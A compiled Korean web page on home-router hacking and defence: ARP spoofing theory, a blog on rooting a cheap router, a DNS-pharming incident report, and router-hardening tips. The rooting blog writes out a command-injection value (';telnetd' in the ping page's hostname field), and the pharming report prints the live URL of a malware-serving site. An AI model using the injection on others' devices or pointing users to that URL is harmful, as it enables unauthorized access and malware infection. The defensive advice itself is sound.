이렇게 다 하고 나면 SSL을 사용하지 않는 홈페이지 정도는 간단히 해킹이 가능하게 됩니다.

공유기 해킹까지는 직접적으로 악용될 소지가 그리 많지 않아 고민 없이 공개했습니다만,

중간자공격(이하 MITM) 이상은 악용될 소지가 상당히 많습니다.

주위에서도 강좌를 말렸고 저도 생각해보니 다음과 같은 끔찍한 상황이 상상되어 강좌 쓰는것을 주저하고 있었습니다.

MITM 공격도 종류가 다양하지만 오늘 얘기하게될 공격은 ARP Spoofing 입니다.

같은 공유기를 사용하는 다른 컴퓨터의 네트워크 통신을 들여다 보게 됩니다.

분명 이 강좌를 보고 나면 해보고싶어지실텐데, 같은 공유기를 사용한다면 가족이나 룸메겠지요.

우리 모두 가족/친구간의 사생활을 침범하는 상황이 없도록 합시다. 제3자를 해킹하는것보다 훨씬 더 치명적인 결과가 옵니다.ㅠㅠ

고로 기대하시는분들께는 죄송하지만 앞으로는 실제 사용되는 툴이나 직접적으로 하는 단계별 방법이 아닌,

이론 위주로 강좌를 진행하겠습니다.

1부에서 언급했다시피, 제가 해킹 강좌를 올리는 이유는 좀 더 많은분들께 허술한 보안상태의 위험을 알리기 위해서랍니다.

해킹을 배우다보면 ” 헐… 내컴도 완전 허술하구나.. 그 누구라도 마음만 먹으면 내컴 뚫는건 시간문제로구나… ” 라는걸 깨닫게 됩니다.

그리고 자기가 알아낸 해킹법으로 부터 안전할수 있도록 대비하게 되지요.

제 의견으로는, 많은 분들이 해킹법을 알면 알수록, 해킹에 대한 피해를 최소화 할수 있다고 생각합니다.

악용하시는분들에 대한 책임은 지지 않습니다

ARP : Address Resolution Protocol (주소 결정 프로토콜)

ARP Spoofing (혹은 ARP Poisoning) : 이 프로토콜을 공격해서 주소간의 연결을 바꾸는 방법입니다.

일반적인 통신의 경우 각 컴퓨터와 공유기가 통신하여 인터넷(혹은 다른 PC)와 정보교환이 이루어집니다.

하지만 ARP를 공격해 이렇게 설정을 바꾼다고 가정합시다:

A 컴퓨터에 저장되어있는 공유기주소를 B 컴퓨터 주소로 바꿉니다 공유기에 저장되어있는 A 컴퓨터 주소를 B 컴퓨터 주소로 바꿉니다.

A 컴퓨터가 인터넷에 접속할때 공유기 대신 B컴퓨터로 정보를 보내게 됩니다. B 컴퓨터는 받은 정보를 다시 공유기에 넘겨줍니다.

반대로 공유기에서 A 컴퓨터로 가는 통신도 B 컴퓨터를 거쳐가게 됩니다.

A 컴퓨터는 평소처럼 아무 문제없이 정보를 보내고 받습니다. 공유기도 평소처럼 A컴퓨터와 통신합니다. (바뀐 주소로)

B는 A가 인터넷으로 뭘 하는지 지켜볼수 있습니다.

이게 바로 ARP Spoofing 입니다.

간단하죠? 공격하는것도 간단합니다.

당하는사람은 모릅니다. (전문가가 의심을 하고 확인을 하면 통신중인 주소가 바뀌었다는것은 알수 있지만, 일반적인 유저는 전혀 알수 없습니다.)

위의 설명대로 자세한 방법과 툴이름은 생략하겟습니다만,

리눅스용 유명~한 툴을 사용하면 키보드 툭툭툭 치면 공격 끝나는겁니다.

윈도우용은 더 쉽습니다. 클맄클맄클맄 하면 끝납니다.

그러고 나면 피자시켜놓고 아이디와 패스워드를 치길 기다리기나 하면 된다는거죠..

방어합시다: APR Spoofing 을 당하더라도 피해가 덜하도록 암호화된 통신을 합시다. (SSL)

특히 은행업무등 중요한일의 경우 SSL이 사용되는지 꼭 확인합니다 (웹주소 옆의 자물쇠)

요즘은 구글등의 이메일이나 SNS도 SSL 을 지원하는곳이 많습니다.

Facebook의 경우 세팅에 가서 직접 “SSL사용” 을 체크해주셔야 합니다.

무엇보다 공유기관리를 잘 해서 제3자와 공유기를 공유하지 맙시다.

커피숍 등에서 은행업무 보지 말라는것도 바로 이런 이유입니다.

——————————————————————————————————————————————————————-

간만의 글이지만.. 인사 생략하고..

아이피타임 살 정도도 안되는 가난함의 압박을 받던중

저 콭똵찌만한 유무선 공유기를 9,800원에 팔고 있길래 냅다 질렀다.

근데 외관 이쁘고 사이즈작고 다 마음에 드는데

내가 무선공유기를 사려고 했던 이유는..

WiFi를 LAN이 아닌 WAN으로 연결하려고 했던거였는데

이거 기본펌웨어에서 지원을 안한다.

아 싼게 비지떡이라고

아이피타임은 되는데…

9,800원이 아까워서 환불해달라고 개 지랄을 할수도 있었지만..

생긴게 맘에들어서 루트를 따보기로 했다.

혹시 머 숨겨놓은 기능같은거 있을거같아서..

일단 텔넷이라도 열고 싶었는데..

보아하니 busybox같은건 당연 있을거같고..

자기네들도 A/S해야하니 telnetd는 기본으로 넣어 컴파일을 했을것이다.

물론 기본적으로는 접속이 안된다.

관리자페이지에 보면 원격 호스트에 ping을 때려볼 수 있는 기능이 있다.

호스트명을 입력하면 결과가 아래 텍스트박스에 나오는 페이지인데..

호스트명에 SQL인젝션도 아니고 쉘 명령어 인젝션이 되는게 아닌가!!

호스트명에 localhost같은거 대신에 ;telnetd 만 입력해주면 텔넷서버가 뜬다..

오예 이상태에서 텔넷 들어가니 들어가진다.

아디 패스워드 물어보는데 관리자페이지 아이디 패스워드랑 동일하다..

대충 둘러보는데 Ralink SoC칩이란다.

그래서 뜯어봤다. 만만할거같아서.

씨퓨+무선랜이 원칩으로 되어있고, 플래시메모리 4메가, 램 16메가 달려있었다.

존내 구굴질 하다 보니 이놈 펌웨어는 Ralink AP SDK로 만들어졌다는 사실을 알 수 있었다.

그래서 또 존내 구굴질 해서 AP SDK 약간 구버전을 입수했다. (당시 검색을 담당한 컴퓨터는 악성코드의 총체적 똥밭이 되었다)

어쨋든 입수했다.

커널+라이브러리+비지빡스+잡동사니 유틸+부트로더+크로스컴파일러 로 구성된 전형적인 임베디드 SDK이다

이제 루트권한을 거의 딴거나 마찬가지!!

기본 옵션으로 SDK를 빌드하니 펌웨어 이미지가 떨어졌다.

자 이거 어케 굽느냐가 관건이다.

머 미친듯이 ls해서 관련된 유틸 찾으면 된다.

mtd_write라는 프로그램하고 /proc/mtd 이런거 잘 찾아보면 어따 구워야되는지 감이온다

이미지를 ftpget명령어로 램디스크 아무데나 가져와서 mtd_write로 구워준다

재부팅한다

새 펌웨어가 적용되었다.

기본적으로 지원되는 공유기모드, 브릿지모드 외에 이더넷컨버터(내가원하던기능), AP클라이언트 기능이 추가되었다!!

AP클라이언트는 생각지도 못한 기똥찬 기능인데

같은 채널에 내 AP를 만들고 같은 채널의 다른 AP에 WAN으로 붙어서 브릿지나 공유기를 구성할 수 있다.

다시말해 남의 무선랜에 붙어서 내 AP 하나 더 만든다는 이야기 되겠다.

문제는 같은 채널이어야 한다는점. 내가 붙을 AP가 어느채널 쓰는지 미리 알아놔야한다

여튼 임베디드 장비를 구입하는것은 노예가 되는 것이요,

루트 권한을 딴 것은 절반을 소유한 것이요,

RS-232 시리얼 포트를 연결하여 부트로더에 접근할 수 있는것은 모든것을 얻은 것이라는 이야기가 있다. (믿거나말거나)

시리얼 포트를 연결해야되는데

이것도 임베디드 장치의 PCB를 그려본사람은 시리얼 포트를 감으로 찾을 수 있다.

이거 뜯으면 정중앙에 핀 4개가 솟아있는데

두개는 전원이고 두개는 신호핀이다

보통 PCB에서 그라운드면하고 굵은패턴에 물린 핀은 전원이라보면 된다.

디바이스마트같은데 가면 참 친절하게도 4핀 TTL신호를 RS-232레벨로 바꿔주는 키트를 판다

엏머 고맙기도하여라

그런데 핀배열마저 딱 맞으니 이거 참 땡큐가 아닐 수 없다.

머 핀배열 안맞으면 해더핀 뽑아서 바꿔주면 된다.

Tx/Rx핀을 구별하는 방법은 Tx핀은 임피던스가 낮고 Rx핀은 임피던스가 높다는 점을 이용하면 테스터기만 가지고도 알 수 있다.

이도저도없으면 LED하나 희생시키면 된다.

netween에서 RT305x칩을 사용하여 만든 공유기 시리즈는 거의 다 같은 방법으로 탈옥(?)된다고 보면 된다.

머 아이피타임것도 비슷한 방법으로 될거같긴한데 아이피타임은 펌웨어를 너무 성의있게 만들어서 털고싶은마음이 안생긴다

네트윈은 애꿎은 아이피타임 까지말고 펌웨어좀 성의있게 만들었으면 좋겠다 ㅆㅂ

내가 이짖까지해야되냐~

p.s 제목이 자극적이라는 지적이 있어 *처리하였습니다.

와이파이 비밀번호 해킹하는 방법

Offcanvas

Some text as placeholder. In real life you can have the elements you have chosen. Like, text, images, lists, etc.

공유기 해킹 방법 정리

반응형

최근 주변에서 공유기가 해킹당해 DNS 변조를 통한 공격을 당한 사례를 많이 접했다.

와이파이를 위해 각 집마다 무선 공유기 1개씩은 가지고 있다고 생각된다.

하지만 공유기 관리페이지에 암호가 걸려있지 않아 누구나 접속하여 설정을 바꿀 수 있는 위험이 있다.

최신 공유기들은 기본적으로 암호가 걸려서 나오지만 비교적 저렴한 구형 공유기들은

구매자가 직접 암호설정을 해야한다.

동봉된 설명서에 접속 방법 등이 모두 나와있지만 암호를 반드시 걸어야한다는 주의사항은 적혀있지

않기 때문에 관리페이지 암호설정의 필요성을 모르는 분들은 이런 DNS파밍 수법에 걸리고 있다.

주변 지인들이 당한 공유기 해킹 수법은 공유기의 DNS를 변조하여 ‘안드로이드 기기’들을 대상으로하는 공격이었다.

DNS파밍에 감염된 안드로이드 기기는 인터넷 접속 시 DNS를 공격 당했기 때문에

모든 페이지에서 악성코드 설치를 유도하는 메시지가 뜬다.

그 메시지는 AhnLab V3 Mobile이 최신버전이 나왔다며 업데이트 하라는 내용이고 이걸 설치하면 악성코드 감염된다.

파밍 사이트는 모바일 네이버 홈페이지로 연결되는 듯 보이지만 실제로는 안드로이드 기기인지 확인하는 페이지를 거친 뒤 안드로이드일 경우 최신 백신을 다운로드 하라는 메시지를 띄운다.

파밍사이트의 연결 주소를 whois검색 시 다음과 같이 일본에서 관리하는 주소로 나오고 있다.

하지만 실제로는 중국에서 공격하고 있기 때문에 일본쪽으로 1차적으로 우회 시키는게 아닌가 싶다.

파밍 사이트 연결 주소 :

http://122.103.125.247/na566w2223/index.php

해당 DNS로 접속시 다음과 같은 소스코드를 얻을 수 있었다.

파밍 사이트의 소스코드 :

소스코드.html

소스코드의 내용을 보면, os정보를 가져오고 안드로이드의 경우 최신 백신으로 업데이트 안내를 하는

메시지를 출력하고 악성코드 다운로드로 유도하고 있다.

* 해결방안

스크린샷에서와 같이 공유기의 DNS서버가 변조되어 있으며

해당 DNS서버를 검색시 hinet.net이라는 중국 쪽 도메인 서비스로 연결되는 것을 볼 수 있다.

간단하게 공유기의 DNS를 다음과 같이 정상 주소로 바꿔주고 공유기 자체에 암호를 걸어주면 된다.

※ iptime 공유기의 암호 설정 방법

http://www.iptime.co.kr/~iptime/bbs/view.php?id=faq_setup&no=635

반응형

안드로이드 기기로 와이파이 해킹하는 법

무선 네트워크의 보안 상태를 점검하고 싶은가? 과거라면 윈도우나 리눅스가 설치된 컴퓨터가 필요했다. 하지만 요즘에는 안드로이드 기기들을 이용해 무선 네트워크의 보안 상태를 확인할 수 있다. 이 작업에 필요한 도구들은 기기가 지원하기만 한다면 무료로 사용 가능하다. 하지만 기억해야 할 것은 허가를 받지 않고 라우터들을 해킹하면 불법이라는 사실이다. 이 글의 내용은 자신이 소유하고 있는 네트워크를 점검하는 데에만 사용하도록 하자.

무선 라우터를 해킹하는 법

진실은 실제로 그러한 것이 없다는 것입니다. 해킹 방지 또는 해커 방지 , 그곳에 아무것도없는 것처럼 완전하게 방수 . 따라서이 기사에서는 무선 라우터를 다음과 같이 논의 할 예정입니다. 해커에 강한 가능한 한. 무선 라우터는 해커가 네트워크에 침투하거나 Wi-Fi 연결을 해제하려는 주요 대상입니다. 다음은 무선 라우터의 해킹을 어렵게 만들 수있는 몇 가지 방법입니다.

WPA2 무선 암호화 사용 강력한 SSID 네트워크 이름 및 미리 공유 된 키 만들기

무선 네트워크를 보호하기 위해 WPA2 (Wi-Fi Protected Access) 암호화를 사용하지 않는 경우 해커가 사실상 네트워크로 바로 들어갈 수 있기 때문에 전면 도어를 열어 두는 것이 좋습니다. 대부분의 해커가 몇 초안에 쉽게 깨뜨린 오래된 WEP (Wired Equivalent Privacy) 보안을 사용하는 경우 WPA2 로의 업그레이드를 고려해야합니다. 이전 라우터는 WPA2 기능을 추가하기 위해 펌웨어 업그레이드가 필요할 수 있습니다. 라우터에서 WPA2 무선 암호화를 활성화하는 방법을 알아 보려면 라우터 제조업체의 설명서를 확인하십시오.

또한 강력한 SSID (무선 네트워크 이름)를 만들어야합니다. 라우터의 기본 네트워크 이름 (예 : Linksys, Netgear, DLINK 등)을 사용하는 경우 해커가 네트워크를 쉽게 해킹 할 수 있습니다. 기본 SSID 또는 일반 SSID를 사용하면 해커가 일반적인 SSID 이름과 연결된 미리 만들어진 레인보우 테이블을 사용하여 무선 암호화를 해독 할 수 있기 때문에 해커가 암호화를 해킹하는 데 도움이됩니다.

기억하기 어려울지라도 길고 랜덤 한 SSID 이름을 만드십시오. 해킹 시도를 더 차단하려면 미리 공유 한 키에 강력한 암호를 사용해야합니다.

무선 라우터의 방화벽 켜기

아직 수행하지 않았다면 무선 라우터의 내장형 방화벽을 활성화하는 것을 고려해야합니다. 방화벽을 활성화하면 인터넷상의 대상을 찾는 해커에게 네트워크가 보이지 않게 할 수 있습니다. 많은 라우터 기반 방화벽에는 네트워크의 가시성을 줄이는 데 사용할 수있는 “숨김 모드”가 있습니다. 방화벽을 올바르게 구성했는지 확인하기 위해 방화벽을 테스트 할 수도 있습니다.

라우터 수준에서 암호화 된 개인 VPN 서비스 사용

가상 개인 네트워크는 대기업 만이 가질 수있는 고급 스러움이었습니다. 이제 작은 월 사용료로 개인 VPN 서비스를 구입할 수 있습니다. 개인 VPN은 해커에게 던질 수있는 가장 큰 장애물 중 하나입니다.

개인 VPN은 프록시 된 IP 주소로 실제 위치를 익명화 할 수있는 기능을 갖추고 있으며 네트워크 트래픽을 보호하기 위해 강력한 암호화 벽을 설치할 수도 있습니다. WiTopia, StrongVPN 및 기타 업체의 개인 VPN 서비스는 2018 년 1 월 기준으로 한 달에 10 달러 정도만 구입할 수 있습니다.

라우터가 라우터 수준에서 개인 VPN 서비스를 지원하는 경우 개인 VPN을 구현하는 가장 좋은 방법은 컴퓨터에서 VPN 클라이언트 소프트웨어를 설정하는 번거 로움없이 네트워크로 들어오고 나가는 모든 트래픽을 암호화 할 수 있기 때문입니다 . 라우터 수준에서 개인 VPN 서비스를 사용하면 클라이언트 컴퓨터 및 기타 장치에서 암호화 프로세스가 중단됩니다. 라우터 수준에서 개인 VPN을 사용하려면 라우터가 VPN을 사용할 수 있는지 확인하십시오. Buffalo Technologies는 다른 라우터 제조업체와 마찬가지로이 기능을 갖춘 여러 라우터를 보유하고 있습니다.

라우터의 무선 기능을 통한 관리자 비활성화

해커가 무선 라우터를 망칠 수 없도록하는 또 다른 방법은 무선을 통한 관리자 환경. 라우터의 무선 기능을 통해 관리자를 비활성화하면 이더넷 케이블을 통해 라우터에 실제로 연결된 사람 만 무선 라우터의 관리 기능에 액세스 할 수 있습니다. 이렇게하면 누군가가 집에서 운전하는 것을 방지하고 Wi-Fi 암호화가 손상된 경우 라우터의 관리 기능에 액세스하는 데 도움이됩니다.

충분한 시간과 자원을 감안할 때 해커가 네트워크를 해킹 할 수는 있지만 위의 단계를 수행하면 네트워크를 더 어려운 대상으로 만들 수 있습니다. 해커가 불만을 품고 쉽게 목표를 달성 할 수 있습니다.

공유기 보안 어떻게 해야 할까? 안전한 공유기 보안을 위한 가이드

1) 관리자 페이지 비밀번호 설정

공유기 사용 전 반드시 영문, 숫자, 특수문자를 조합한 8자리 이상의 관리자 비밀번호를 설정합니다.

2) 무선 공유기의 비밀번호 설정

무선 공유기를 사용할 경우 WPA2(Wi-Fi Protected Access) 인증방식 적용하며, 역시 비밀번호는 영문, 숫자, 특수문자를 조합한 8자리 이상으로 설정합니다.

3) 공유기 원격관리 기능 해제

원격관리 기능을 사용하지 않을 경우 반드시 ‘사용하지 않음’으로 설정합니다. 원격 관리 기능을 사용할 경우에도 비밀번호를 8글자 이상으로 설정합니다.

4) 공유기 펌웨어 최신버전 유지

공유기의 펌웨어 버전이 최신 버전이 아닌 경우, 자동 업그레이드를 통해 최신 버전으로 유지합니다.

5) 공공장소 무선인터넷 이용 시 단말기 DNS 수동 설정

사용자는 단말기(노트북, 스마트기기)의 DNS 설정을 알려진 대표 DNS IP로 수동 설정합니다.

이 중에서 가장 중요한 것은 공유기의 비밀번호를 설정하는 것입니다. 관리자의 아이디와 비밀번호를 설정해야 하며, 공유기에 연결할 수 있는 무선랜(혹은 무선인터넷)에도 비밀번호를 반드시 설정해야 합니다. 공유기 관리자 계정이나 무선랜에 비밀번호가 설정되어 있지 않을 경우, 불특정 다수가 손쉽게 공유기에 연결해 인터넷을 마음대로 사용할 수 있습니다. 또한, 해커들은 해킹을 통해 공유기의 설정을 조작하고, 금융정보와 같은 주요 정보를 빼갈 수도 있습니다.

더불어 백신 프로그램 설치와 주기적인 점검, 프로그램 보안 패치 설치, 출처 불분명 메일이나 링크 클릭 금지 등과 같은 안전한 인터넷 사용 습관도 중요합니다. 그런데 만약 공유기가 감염되었다면 어떻게 해야 할까요? 그런 상황이 발생한다면, 아래와 같은 순서로 공유기의 보안상태 점검과 보안조치를 해야 합니다.

▶ 감염된 공유기의 보안상태 점검과 보안조치 순서

키워드에 대한 정보 공유기 해킹 방법

다음은 Bing에서 공유기 해킹 방법 주제에 대한 검색 결과입니다. 필요한 경우 더 읽을 수 있습니다.

See also  노트북 배경화면 1920X1080 고화질 | 힐링되는 윈도우10 바탕화면 설정하는 방법 답을 믿으세요
See also  멋진 인생 악보 | 박정식 멋진인생 모든 답변

See also  스타 크래프트 리마스터 싱글 무료 | 스타크래프트 리마스터 무료 다운로드 및 설치 배틀넷 접속해서 게임하기 54 개의 가장 정확한 답변

이 기사는 인터넷의 다양한 출처에서 편집되었습니다. 이 기사가 유용했기를 바랍니다. 이 기사가 유용하다고 생각되면 공유하십시오. 매우 감사합니다!

사람들이 주제에 대해 자주 검색하는 키워드 공유기 해킹 : 해커들은 공유기를 왜? 좋아할까? 보안쟁이가 알려주는 대처 방법(홈네트워크 IoT 파밍 보안)

  • 공유기
  • Wi-Fi
  • IoT
  • SSID
  • ip TIME
  • WPA2
  • 파밍
  • DNS
  • 유무선공유기

공유기 #해킹 #: #해커들은 #공유기를 #왜? #좋아할까? #보안쟁이가 #알려주는 #대처 #방법(홈네트워크 #IoT #파밍 #보안)


YouTube에서 공유기 해킹 방법 주제의 다른 동영상 보기

주제에 대한 기사를 시청해 주셔서 감사합니다 공유기 해킹 : 해커들은 공유기를 왜? 좋아할까? 보안쟁이가 알려주는 대처 방법(홈네트워크 IoT 파밍 보안) | 공유기 해킹 방법, 이 기사가 유용하다고 생각되면 공유하십시오, 매우 감사합니다.

Leave a Reply

Your email address will not be published. Required fields are marked *